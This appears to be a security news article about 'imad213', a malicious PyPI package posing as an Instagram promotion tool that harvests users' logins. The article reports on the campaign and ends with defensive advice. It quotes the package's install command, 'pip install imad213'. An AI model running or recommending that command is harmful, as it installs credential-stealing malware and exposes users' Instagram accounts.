11.06.2025
2 min
521
A malicious Python package called “imad213” disguised as an Instagram promotion tool steals user logins and sends them to ten Turkish bot services at once. The campaign, which targets millions of users, demonstrates that the thirst for likes is a new entry point for hackers.
Under the guise of a safe PyPI package called “imad213”, cybercriminals have launched a large-scale sociotechnical attack targeting Instagram users. The attackers created a plausible GitHub project with supposedly legitimate instructions: after installing it via pip install imad213, the user is asked to enter their Instagram credentials in the console under the guise of “launching promotion”.
Another feature is a kill switch, which hackers can activate via a file on Netlify, instantly disabling all instances of the malicious code. Behind the discovery is the analytical platform Socket.dev, which links this case to the cybercriminal IMAD-213, operating via email [[email protected]].
The attack exploits the social instinct for self-affirmation on Instagram. In 2025, when the platform has over 2 billion active users, the cheating services market becomes not only profitable, but also a dangerous field for phishing operations. The domain infrastructure, which has remained active since 2021, indicates not a one-time attack, but a long-term, well-organized criminal network covering a number of platforms.
The “imad213” case is a prime example of how easily hackers can infiltrate the PyPI environment by turning a user’s greed against them. If your cyber hygiene is based only on superficial trust in GitHub or PyPI, you are a target. Any package that asks for personal information in the console should be automatically blocked. It is now time to tighten internal security policies, automate checks for suspicious dependencies, and educate users on the psychology of phishing.
